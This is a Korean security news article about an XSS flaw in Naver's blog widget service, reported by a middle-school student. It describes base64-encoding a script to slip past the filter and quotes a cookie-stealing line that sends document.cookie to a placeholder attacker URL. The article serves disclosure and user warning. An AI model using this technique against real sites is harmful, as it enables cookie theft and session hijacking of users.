네이버 위젯 서비스에서 XSS 취약점이 발견됐다. 이 취약점을 발견한 신서중학교 2학년 이인호 학생은 지난 2월경 해당 취약점을 발견하고 데일리시큐에 최근 제보를 해 왔으며 “위젯 서비스는 네이버 블로그의 자랑거리 중 하나가 될 수 있는 만큼 보안이 더 강해졌으면 하는 바람에서 제보하게 됐다”고 밝혔다. NHN 네이버 측은 신속한 조치가 있어야 할 것이다.
 
위젯 서비스의 XSS 취약점 내용을 살펴보면, 일단 base64와 같은 암호화를 통해 XSS구문을 인코딩한다. 그후 위젯을 실행하는 소스에서 암호화된 XSS구문을 복호화시켜주도록 작성하면 위젯 서비스를 이용한 XSS가 적용된다.
 
이 취약점은 위젯을 직접 유저가 소스를 만들어 사용할 수 있고 그 소스를 구동하는 형태로 위젯이 작동된다는 점을 이용한 취약점이다.
 
이 취약점을 이용하면 어떤 위험성이 있을까. 제보자는 다음과 같이 설명했다.
 
“테스트한 구문 alert('Charset_XSS') 대신에 쿠키를 탈취하도록 해주면 alert 구문이 작동한 것처럼 쿠키 또한 전송될 것으로 보인다.
(php 소스: rhddustjd.blog.me/30132004483)
 
php를 본인 FTP에 적용시킨 후 "http://본인ftp.com/php.php?c=" + document.cookie로 이동시키는 방법 등을 통해서 쿠키 탈취가 가능할 것으로 예상된다”고 설명했다.
 
쿠키 탈취는 세션 하이제킹 등의 기법에 사용될 수 있기 때문에 주의해야 한다.
 
이 취약점을 네이버 측에서 차단하기 위해서는 어떻게 해야 할까. base64와 같은 인코딩/디코딩 이 가능한 암호화 이름이 있다면, 혹은 암호화 된 문자열이 있다면 위젯 등록을 할 수 없게 하면 될 것이라고 그는 제안했다.
 
또한 이용자 측면에서 그는 “이용자는 alert 구문이 없이 쿠키 탈취 구문만 있는 블로그에 접속해서 쿠키가 탈취당하게 된다면 알 수 없는 일”이라며 “주의해야 한다면 의심되는 블로그나 지인의 블로그가 아니라면 되도록 접속하지 않는 것이 안전할 것”이라고 주의를 당부했다.
[데일리시큐=길민권 기자]